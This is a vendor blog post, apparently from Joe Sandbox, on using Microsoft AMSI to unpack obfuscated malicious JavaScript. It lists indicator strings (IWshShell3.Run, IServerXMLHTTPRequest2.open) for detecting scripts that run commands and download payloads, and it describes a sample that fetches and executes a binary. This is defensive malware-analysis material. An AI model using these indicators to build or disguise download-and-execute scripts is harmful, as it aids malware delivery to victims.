Tuesday, February 5, 2019

Generic Unpacking of Javascript with Microsoft AMSI

Malicious Javascript files dominate the ranking of malicious e-mail attachments for the year 2018 with 37,2%. Why is that? Due to the flexibility of the Javascript language as well as various dynamic code execution functions, packing and encryption is easy to achieve. As a result, detection of malicious Javascript files is extremely difficult. Below is an example of a recent malicious Javascript file:

Wouldn't it be nice to get the unpacked and deobfuscated Javascript code? This would help to detect malicious Javascript and also reveal additional behavior indicators.

Security Engineers have proposed to use Javascript emulators. The emulator will run the file and output various internal states such as parameters and string values. This works great in theory, but not in the real world. Malware authors quickly adapted and added code to detect the emulator. Below is an example of a sample which verifies the number of processors:

We, therefore, thought there must be a better way. Enter the Microsoft Antimalware Scan Interface (AMSI).

AMSI in a Nutshell

AMSI is a generic interface standard that allows applications and services to integrate with any anti-malware product present on a machine. It basically enables to hook into a Windows interface which is also used by Windows Defender. Here is an image from the Microsoft Cloud Blog outlining how AMSI works with Microsoft Office.

Image Source

Behavior logs are mostly string buffers of executed code. In addition to Microsoft Office, AMSI also provides buffers for

  • Wscript.exe, VBA Code
  • Csript.exe, Javascript Code
  • Powershell.exe, PS1 Code
Here is an example AMSI output for a Javascript file:

Here another one:

AMSI does not care about packing & unpacking and obfuscation. It will send all executed code as strings to the interface. As a result, AMSI is the perfect unpacker and deobfuscator. Malware cannot use AMSI as an indicator for evasion since AMSI runs on real targets as part of the Windows Defender. Approaches to disable or evade AMSI can be detected and serve as an additional malicious indicator. 

Detecting Packed Javascript Files with AMSI

With the AMSI output, one can also easily detect packed Javascript files. The approach is straightforward:

Given a potentially malicious Javascript file, we check if it contains suspicious strings such as IWshShell3.Run or IServerXMLHTTPRequest2.open. If we find one or a combination of such strings, the sample is considered malicious. If we do not find such strings, we will check each AMSI buffer for the strings. Please note that AMSI will send all code including the code passed to the eval function. If we find a string, we will know for sure that the sample is malicious as well as packed. If we do not find any string, the sample is considered clean.

We have added the above algorithm to Joe Sandbox v25 Tiger's Eye which is planned for mid-February. Below you find an example signature hit of unpacking detection for the Javascript sample shown in the introduction.

Joe Sandbox has detected the unpacking and displays the full unpacked code. Here the function of the script is to download a binary and then execute it.

You find the full analysis report here.

Final Words

37% of all malicious e-mail attachments are Javascript files. Javascript allows to easily pack and obfuscate code. As a result, Javascript files often slip through today's detection engines such as antivirus and endpoint protection. The Microsoft Anti-Malware Scan Interface is an ideal tool to unpack and deobfuscate malicious Javascript.

Joe Sandbox v25 Tiger's Eye includes an implementation of the AMSI interface and detects and unpacks Javascript files.